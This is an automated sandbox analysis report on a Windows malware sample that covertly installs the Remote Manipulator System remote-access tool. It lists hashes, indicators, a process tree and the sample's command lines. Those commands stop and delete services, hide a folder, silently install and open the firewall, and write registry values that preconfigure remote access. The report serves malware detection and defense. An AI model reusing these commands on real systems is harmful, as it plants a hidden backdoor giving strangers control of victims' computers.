Analysis
max time kernel: 146s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-11-2022 19:58
Static task: static1
Behavioral task: behavioral1
Sample: e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe
Resource: win7-20220812-en
General
Target: e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe
Size: 4.1MB
MD5: eae75b37854b85772f17ac14433d1c9c
SHA1: 548cdfc98868615232033618b6bd926c20e25acd
SHA256: e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe
SHA512: 3b234d252a479940a8f9b2171a59eb90e927db671ffc5bcffec925ec07ca410f050929ebb2c232cda3aca1752542e1d3ca67a70f17c2ee0f0498812c30aae512
SSDEEP: 98304:VgwRVwrPDPnWKw6ki4JNHrotxdJP2jTqmuX3O2HChZy7hx:VgCIu5cUpoXdJuSmyOXo7b
Malware Config
Signatures

Executes dropped EXE (8 IoCs)
Processes (pid, process):
1376 data.exe
3476 rutserv.exe
4404 rutserv.exe
4348 rutserv.exe
3392 rutserv.exe
532 rfusclient.exe
1112 rfusclient.exe
3432 rfusclient.exe

Sets file to hidden (1 TTPs, 1 IoCs)
Modifies file attributes to stop it showing in Explorer etc.

Stops running service(s) (3 TTPs)

Processes (resource, yara_rule):
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe upx
C:\Windows\spom\rfusclient.exe upx
C:\Windows\spom\rfusclient.exe upx
C:\Windows\spom\rfusclient.exe upx
behavioral2/memory/532-183-0x0000000000400000-0x0000000000AE6000-memory.dmp upx
behavioral2/memory/1112-184-0x0000000000400000-0x0000000000AE6000-memory.dmp upx
C:\Windows\spom\rfusclient.exe upx
behavioral2/memory/3432-187-0x0000000000400000-0x0000000000AE6000-memory.dmp upx
behavioral2/memory/532-188-0x0000000000400000-0x0000000000AE6000-memory.dmp upx
behavioral2/memory/1112-189-0x0000000000400000-0x0000000000AE6000-memory.dmp upx

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes (description, ioc, process):
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe

Checks whether UAC is enabled
Processes (description, ioc, process):
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA data.exe

AutoIT Executable (3 IoCs)
AutoIT scripts compiled to PE executables.
Processes (resource, yara_rule):
C:\Users\Admin\AppData\Local\Temp\data.exe autoit_exe
C:\Users\Admin\AppData\Local\Temp\data.exe autoit_exe
C:\Users\Admin\AppData\Local\Temp\hide.exe autoit_exe

Drops file in Windows directory (64 IoCs)
Processes (description, ioc, process):
File created C:\Windows\spom\dd_vcredistUI4F1D.txt cmd.exe
File created C:\Windows\spom\nouac.cmd cmd.exe
File opened for modification C:\Windows\spom\rutserv.exe cmd.exe
File opened for modification C:\Windows\spom\StructuredQuery.log cmd.exe
File created C:\Windows\spom\wctC61E.tmp cmd.exe
File created C:\Windows\spom\AdobeSFX.log cmd.exe
File opened for modification C:\Windows\spom\data.exe cmd.exe
File created C:\Windows\spom\GBQHURCC-20220812-1921.log cmd.exe
File opened for modification C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_191538705.html cmd.exe
File opened for modification C:\Windows\spom\wmsetup.log cmd.exe
File created C:\Windows\spom\684259a6-0175-4108-a860-699cb31f63c2.tmp cmd.exe
File opened for modification C:\Windows\spom\dd_vcredistUI4F1D.txt cmd.exe
File created C:\Windows\spom\webmmux.dll cmd.exe
File opened for modification C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp cmd.exe
File opened for modification C:\Windows\spom\hide.exe cmd.exe
File created C:\Windows\spom\wct1510.tmp cmd.exe
File opened for modification C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp cmd.exe
File opened for modification C:\Windows\spom\chrome_installer.log cmd.exe
File opened for modification C:\Windows\spom\nouac.cmd cmd.exe
File created C:\Windows\spom\vp8encoder.dll cmd.exe
File created C:\Windows\spom\webmvorbisencoder.dll cmd.exe
File opened for modification C:\Windows\spom\dd_vcredistMSI4F4B.txt cmd.exe
File created C:\Windows\spom\dd_vcredistUI4F4B.txt cmd.exe
File opened for modification C:\Windows\spom\dd_vcredistMSI4F1D.txt cmd.exe
File opened for modification C:\Windows\spom\rfusclient.exe cmd.exe
File opened for modification C:\Windows\spom\webmvorbisdecoder.dll cmd.exe
File created C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp cmd.exe
File opened for modification C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe
File opened for modification C:\Windows\spom\GBQHURCC-20220812-1921.log cmd.exe
File opened for modification C:\Windows\spom\msedge_installer.log cmd.exe
File created C:\Windows\spom\rfusclient.exe cmd.exe
File created C:\Windows\spom\StructuredQuery.log cmd.exe
File created C:\Windows\spom\uac.cmd cmd.exe
File opened for modification C:\Windows\spom\vp8encoder.dll cmd.exe
File created C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe
File opened for modification C:\Windows\spom\dd_vcredistUI4F4B.txt cmd.exe
File opened for modification C:\Windows\spom\wct8E36.tmp cmd.exe
File created C:\Windows\spom\dd_vcredistMSI4F1D.txt cmd.exe
File created C:\Windows\spom\hide.exe cmd.exe
File created C:\Windows\spom\rutserv.exe cmd.exe
File opened for modification C:\Windows\spom\wctC61E.tmp cmd.exe
File created C:\Windows\spom\aria-debug-4640.log cmd.exe
File created C:\Windows\spom\chrome_installer.log cmd.exe
File opened for modification C:\Windows\spom\jawshtml.html cmd.exe
File opened for modification C:\Windows\spom\vp8decoder.dll cmd.exe
File opened for modification C:\Windows\spom\adc52f94-c82e-434e-9f30-9b348375f053.tmp cmd.exe
File opened for modification C:\Windows\spom\JavaDeployReg.log cmd.exe
File created C:\Windows\spom\JavaDeployReg.log cmd.exe
File opened for modification C:\Windows\spom\jusched.log cmd.exe
File created C:\Windows\spom\wct4E2A.tmp cmd.exe
File opened for modification C:\Windows\spom\webmmux.dll cmd.exe
File created C:\Windows\spom\webmvorbisdecoder.dll cmd.exe
File created C:\Windows\spom\a6b75105-7dc9-45ac-b70c-19519ab6d538.tmp cmd.exe
File opened for modification C:\Windows\spom\AdobeSFX.log cmd.exe
File opened for modification C:\Windows\spom\BroadcastMsg_1660332030.txt cmd.exe
File opened for modification C:\Windows\spom\uac.cmd cmd.exe
File created C:\Windows\spom\vp8decoder.dll cmd.exe
File opened for modification C:\Windows\spom\wct399A.tmp cmd.exe
File opened for modification C:\Windows\spom\wct4E2A.tmp cmd.exe
File opened for modification C:\Windows\spom attrib.exe
File created C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp cmd.exe
File opened for modification C:\Windows\spom\GBQHURCC-20220812-1921a.log cmd.exe
File created C:\Windows\spom\jusched.log cmd.exe
File created C:\Windows\spom\msedge_installer.log cmd.exe

Launches sc.exe (2 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes (pid, process):
1044 sc.exe
5036 sc.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Runs net.exe

Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes (pid, process):
3476 rutserv.exe
3476 rutserv.exe
3476 rutserv.exe
3476 rutserv.exe
3476 rutserv.exe
3476 rutserv.exe
4404 rutserv.exe
4404 rutserv.exe
4348 rutserv.exe
4348 rutserv.exe
3392 rutserv.exe
3392 rutserv.exe
3392 rutserv.exe
3392 rutserv.exe
3392 rutserv.exe
3392 rutserv.exe
532 rfusclient.exe
532 rfusclient.exe

Suspicious behavior: SetClipboardViewer (1 IoCs)
Processes (pid, process):
3432 rfusclient.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
Processes (description, pid, process):
Token: SeDebugPrivilege 3476 rutserv.exe
Token: SeDebugPrivilege 4348 rutserv.exe
Token: SeTakeOwnershipPrivilege 3392 rutserv.exe
Token: SeTcbPrivilege 3392 rutserv.exe
Token: SeTcbPrivilege 3392 rutserv.exe

Suspicious use of FindShellTrayWindow (3 IoCs)
Processes (pid, process):
1376 data.exe
1376 data.exe
1376 data.exe

Suspicious use of SendNotifyMessage (3 IoCs)
Processes (pid, process):
1376 data.exe
1376 data.exe
1376 data.exe

Suspicious use of SetWindowsHookEx (4 IoCs)
Processes (pid, process):
3476 rutserv.exe
4404 rutserv.exe
4348 rutserv.exe
3392 rutserv.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description, pid, process -> target process):
PID 1500 wrote to memory of 1376 (1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe -> data.exe)
PID 1500 wrote to memory of 1376 (1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe -> data.exe)
PID 1500 wrote to memory of 1376 (1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe -> data.exe)
PID 1500 wrote to memory of 2112 (1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe -> cmd.exe)
PID 1500 wrote to memory of 2112 (1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe -> cmd.exe)
PID 1500 wrote to memory of 2112 (1500 e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe -> cmd.exe)
PID 1376 wrote to memory of 4532 (1376 data.exe -> cmd.exe)
PID 1376 wrote to memory of 4532 (1376 data.exe -> cmd.exe)
PID 1376 wrote to memory of 4532 (1376 data.exe -> cmd.exe)
PID 4532 wrote to memory of 308 (4532 cmd.exe -> net.exe)
PID 4532 wrote to memory of 308 (4532 cmd.exe -> net.exe)
PID 4532 wrote to memory of 308 (4532 cmd.exe -> net.exe)
PID 308 wrote to memory of 4040 (308 net.exe -> net1.exe)
PID 308 wrote to memory of 4040 (308 net.exe -> net1.exe)
PID 308 wrote to memory of 4040 (308 net.exe -> net1.exe)
PID 4532 wrote to memory of 1820 (4532 cmd.exe -> net.exe)
PID 4532 wrote to memory of 1820 (4532 cmd.exe -> net.exe)
PID 4532 wrote to memory of 1820 (4532 cmd.exe -> net.exe)
PID 1820 wrote to memory of 2888 (1820 net.exe -> net1.exe)
PID 1820 wrote to memory of 2888 (1820 net.exe -> net1.exe)
PID 1820 wrote to memory of 2888 (1820 net.exe -> net1.exe)
PID 4532 wrote to memory of 1044 (4532 cmd.exe -> sc.exe)
PID 4532 wrote to memory of 1044 (4532 cmd.exe -> sc.exe)
PID 4532 wrote to memory of 1044 (4532 cmd.exe -> sc.exe)
PID 4532 wrote to memory of 5036 (4532 cmd.exe -> sc.exe)
PID 4532 wrote to memory of 5036 (4532 cmd.exe -> sc.exe)
PID 4532 wrote to memory of 5036 (4532 cmd.exe -> sc.exe)
PID 4532 wrote to memory of 1420 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 1420 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 1420 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 4612 (4532 cmd.exe -> attrib.exe)
PID 4532 wrote to memory of 4612 (4532 cmd.exe -> attrib.exe)
PID 4532 wrote to memory of 4612 (4532 cmd.exe -> attrib.exe)
PID 4532 wrote to memory of 3476 (4532 cmd.exe -> rutserv.exe)
PID 4532 wrote to memory of 3476 (4532 cmd.exe -> rutserv.exe)
PID 4532 wrote to memory of 3476 (4532 cmd.exe -> rutserv.exe)
PID 4532 wrote to memory of 4404 (4532 cmd.exe -> rutserv.exe)
PID 4532 wrote to memory of 4404 (4532 cmd.exe -> rutserv.exe)
PID 4532 wrote to memory of 4404 (4532 cmd.exe -> rutserv.exe)
PID 4532 wrote to memory of 3196 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 3196 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 3196 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 4208 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 4208 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 4208 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 2248 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 2248 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 2248 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 4244 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 4244 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 4244 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 1748 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 1748 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 1748 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 2656 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 2656 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 2656 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 2292 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 2292 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 2292 (4532 cmd.exe -> reg.exe)
PID 4532 wrote to memory of 4348 (4532 cmd.exe -> rutserv.exe)
PID 4532 wrote to memory of 4348 (4532 cmd.exe -> rutserv.exe)
PID 4532 wrote to memory of 4348 (4532 cmd.exe -> rutserv.exe)
PID 3392 wrote to memory of 532 (3392 rutserv.exe -> rfusclient.exe)

Views/modifies file attributes (1 TTPs, 1 IoCs)

Processes
C:\Users\Admin\AppData\Local\Temp\e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\e333a0f636d2504eeea190769488506a77ed1f0bf8f2535e86c728971e068abe.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\data.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\data.exe"
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c nouac.cmd
      - Drops file in Windows directory
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net.exe
        cmdline: net stop netaservice
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe
          cmdline: C:\Windows\system32\net1 stop netaservice
      C:\Windows\SysWOW64\net.exe
        cmdline: net stop rmanservice
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe
          cmdline: C:\Windows\system32\net1 stop rmanservice
      C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete netaservice
        - Launches sc.exe
      C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete rmanservice
        - Launches sc.exe
      C:\Windows\SysWOW64\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
      C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib +s +h "C:\Windows\spom"
        - Sets file to hidden
        - Drops file in Windows directory
        - Views/modifies file attributes
      C:\Windows\spom\rutserv.exe
        cmdline: "rutserv.exe" /silentinstall
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
      C:\Windows\spom\rutserv.exe
        cmdline: "rutserv.exe" /firewall
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of SetWindowsHookEx
      C:\Windows\SysWOW64\reg.exe
        cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d [value elided]
      C:\Windows\SysWOW64\reg.exe
        cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
      C:\Windows\SysWOW64\reg.exe
        cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034 00
      C:\Windows\SysWOW64\reg.exe
        cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d [value elided]
      C:\Windows\SysWOW64\reg.exe
        cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d [value elided]
      C:\Windows\SysWOW64\reg.exe
        cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"
      C:\Windows\SysWOW64\reg.exe
        cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
      C:\Windows\spom\rutserv.exe
        cmdline: "rutserv.exe" /start
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
  C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
C:\Windows\spom\rutserv.exe
  cmdline: C:\Windows\spom\rutserv.exe
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\spom\rfusclient.exe
    cmdline: C:\Windows\spom\rfusclient.exe /tray
    - Executes dropped EXE
  C:\Windows\spom\rfusclient.exe
    cmdline: C:\Windows\spom\rfusclient.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    C:\Windows\spom\rfusclient.exe
      cmdline: C:\Windows\spom\rfusclient.exe /tray
      - Executes dropped EXE
      - Suspicious behavior: SetClipboardViewer

Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
Filesize: 300B
MD5: ad4e1f735a6dc6186785994664e4a6ca
SHA1: abb665a10047585838e600ed4d2e3fb23314698c
SHA256: 0e6f1b05360848a0cea7dcc9a8bdf33d678ba69ad0ab646fbfbc265263eca662
SHA512: ae0e9ebde76b56c6d1fe5f92996b723a7a9fbf4b134a430fb315c6fe057b0075cc63c39fc589d1b051223dbe03bb27791bb9353d92ef2bf95b580eded037365d

C:\Users\Admin\AppData\Local\Temp\data.exe
Filesize: 819KB
MD5: 71a944406c89ab321cb1e55c37916d70
SHA1: be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA256: 4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA512: 9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda

C:\Users\Admin\AppData\Local\Temp\hide.exe
Filesize: 819KB
MD5: 72cc4ab6ee23c79bbeed4c4d7b31f741
SHA1: a5598acb794ebbbad6c0819c20f6f7ed99541e89
SHA256: 5be7bb92afe804aa0eaac077f5527f9710c5a3ebd6a7c898d810d3d0388ecf73
SHA512: 4840b26abe306cdd05694eb8f0f750e451d83cdb4787b5539d730645ce66b2915b422f9e6be4a22885929fffb3c4b5bb50d9ffa8454045a11b55277c611eabf5

C:\Users\Admin\AppData\Local\Temp\nouac.cmd
Filesize: 10KB
MD5: 7050a3b6745999edb2eeeacfc2a580ba
SHA1: f452f8e96bf51887910416452ae0f8c7b5d39a00
SHA256: abc449be609cbc0ae99649f4c4eb06380aa9467dc243346b3fa17e61104eec94
SHA512: 8c888de3a77ecde92a172c4314d91cfb9cefd215397bdded3e448190f5c1de9d7e38a94e581c8e5c0527516a2fc0697e78828773d3ef834bfde41085745d24d7

C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize: 1.8MB
MD5: 3afec4347159849e4ef50d179ff1fed7
SHA1: 9b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA256: 7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512: aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize: 6.3MB
MD5: 93a4649d70ce76d6815874fc7a72c6fb
SHA1: 1e9f663fd9cb66140001847849ddf0451365233f
SHA256: 6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512: a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

C:\Users\Admin\AppData\Local\Temp\uac.cmd
Filesize: 10KB
MD5: c4c7b84f53ad6a9801818d1dfe71dce8
SHA1: 82de045aacf84825cd301be26a941c2fb2eea36b
SHA256: fc612fa3869d2c4ab22a1bb500e405c4318ee4fed16e2da28974f3aa97bab844
SHA512: 1fef234ae4e5255d93670cf5794c7e032d623f101699dcffa4bd26b9e7411679d544afec8f05762a5e96134a10efe9ff41e75edab9607ed5288851332ce37e97

C:\Users\Admin\AppData\Local\Temp\vp8decoder.dll
Filesize: 127KB
MD5: bda3c03c3e5d65922a311009e0ae8cd6
SHA1: 37093c457ac5f01649b4d23a3d075a531af08baa
SHA256: 30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
SHA512: eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b

C:\Users\Admin\AppData\Local\Temp\vp8encoder.dll
Filesize: 238KB
MD5: 200cba4b9cbdd64f1a281b89cd1467f3
SHA1: fc3ccf8d57efcdc0d22b61ff6e49798d551a9118
SHA256: c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e
SHA512: 15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3

C:\Users\Admin\AppData\Local\Temp\webmmux.dll
Filesize: 90KB
MD5: aa78ed008f72533c7136bf6d4bddb0d0
SHA1: 2e9abd74e615adc99f561cbdbe6067dfd81a406a
SHA256: 41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11
SHA512: e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021

C:\Users\Admin\AppData\Local\Temp\webmvorbisdecoder.dll
Filesize: 141KB
MD5: 0867a260483876336a727cf9f2928b13
SHA1: 3c8c59bfba6ed2aeef35c0d1fc4689683df1e660
SHA256: cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207
SHA512: b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f

C:\Users\Admin\AppData\Local\Temp\webmvorbisencoder.dll
Filesize: 202KB
MD5: 43adc4acd56c56b0a25664954c7aa80c
SHA1: d9085625b4a39b3969db8047ad3224b3fc9f60fc
SHA256: 0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918
SHA512: 346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515

C:\Windows\spom\rfusclient.exe
Filesize: 1.8MB
MD5: 3afec4347159849e4ef50d179ff1fed7
SHA1: 9b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA256: 7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512: aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

C:\Windows\spom\rutserv.exe
Filesize: 6.3MB
MD5: 93a4649d70ce76d6815874fc7a72c6fb
SHA1: 1e9f663fd9cb66140001847849ddf0451365233f
SHA256: 6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512: a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

C:\Windows\spom\vp8decoder.dll
Filesize: 127KB
MD5: bda3c03c3e5d65922a311009e0ae8cd6
SHA1: 37093c457ac5f01649b4d23a3d075a531af08baa
SHA256: 30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
SHA512: eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b

C:\Windows\spom\vp8encoder.dll
Filesize: 238KB
MD5: 200cba4b9cbdd64f1a281b89cd1467f3
SHA1: fc3ccf8d57efcdc0d22b61ff6e49798d551a9118
SHA256: c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e
SHA512: 15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3

C:\Windows\spom\webmmux.dll
Filesize: 90KB
MD5: aa78ed008f72533c7136bf6d4bddb0d0
SHA1: 2e9abd74e615adc99f561cbdbe6067dfd81a406a
SHA256: 41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11
SHA512: e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021

C:\Windows\spom\webmvorbisdecoder.dll
Filesize: 141KB
MD5: 0867a260483876336a727cf9f2928b13
SHA1: 3c8c59bfba6ed2aeef35c0d1fc4689683df1e660
SHA256: cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207
SHA512: b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f

C:\Windows\spom\webmvorbisencoder.dll
Filesize: 202KB
MD5: 43adc4acd56c56b0a25664954c7aa80c
SHA1: d9085625b4a39b3969db8047ad3224b3fc9f60fc
SHA256: 0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918
SHA512: 346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515

Memory dumps:
memory/308-141-0x0000000000000000-mapping.dmp
